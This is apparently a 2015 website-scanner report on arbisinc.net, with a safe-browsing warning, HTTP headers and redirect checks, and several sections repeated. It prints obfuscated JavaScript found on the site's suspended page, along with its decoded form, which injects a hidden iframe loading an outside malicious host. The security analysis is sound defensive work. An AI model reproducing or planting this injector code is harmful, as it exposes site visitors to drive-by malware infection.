Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=arbisinc.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://arbisinc.net/ | HTTP/1.1 302 Found Connection: close Date: Sun, 08 Mar 2015 14:02:10 GMT Location: http://arbisinc.net/cgi-sys/suspendedpage.cgi Server: nginx/1.6.2 Content-Length: 291 Content-Type: text/html; charset=iso-8859-1 | clean |
http://arbisinc.net/cgi-sys/suspendedpage.cgi | 200 OK Content-Length: 27187 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var ar="rf:pmy'1uvAE, hi)2Tbs{ [tg=BcC\"do<a(.}N/9];wl>en0";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f66,0,-21,-42,36,66,-12,3,-12,-60,-12,126,3,-69,36,-33,63,-66,-39,99,6,-126,126,3,-69,-12,21,-66,39,48,-27,39,-12,-90,126,-33,-87,39,39,-3,-78,3,30,21,75,-21,-75,15,3,0,0,-21,-42,-3,102,-90,126,-138,105,-57,78,-60,0,45,-72,99,-6,-72,78,-99,24,3,0,0,27,3,-12,-60,-12,126,3,-69,36,21,-129,45,27,66,-33,-15,9,-54,-42,-3,102,-90,126 ...[1914 bytes skipped]... Decoded script: ...[94579 bytes skipped]... os,1) pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4 pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4 s+=ar.substr(pos,1) s+=ar.substr(pos,1) pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4 pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4 s+=ar.substr(pos,1) s+=ar.substr(pos,1) if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://zamhuxnh.cz.cc/count28.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://zamhuxnh.cz.cc/count28.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } if (document.getElementsByTag ...[708 bytes skipped]... Antivirus reports:
| ||
http://arbisinc.net/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 08 Mar 2015 14:02:11 GMT Location: http://arbisinc.net/cgi-sys/suspendedpage.cgi Server: nginx/1.6.2 Content-Length: 291 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: arbisinc.net
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sun, 08 Mar 2015 14:02:10 GMT
Location: http://arbisinc.net/cgi-sys/suspendedpage.cgi
Server: nginx/1.6.2
Content-Length: 291
Content-Type: text/html; charset=iso-8859-1
...291 bytes of data.
GET / HTTP/1.1
Host: arbisinc.net
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sun, 08 Mar 2015 14:02:10 GMT
Location: http://arbisinc.net/cgi-sys/suspendedpage.cgi
Server: nginx/1.6.2
Content-Length: 291
Content-Type: text/html; charset=iso-8859-1
...291 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: arbisinc.net
Referer: http://www.google.com/search?q=arbisinc.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: arbisinc.net
Referer: http://www.google.com/search?q=arbisinc.net
Result:
The result is similar to the first query. There are no suspicious redirects found.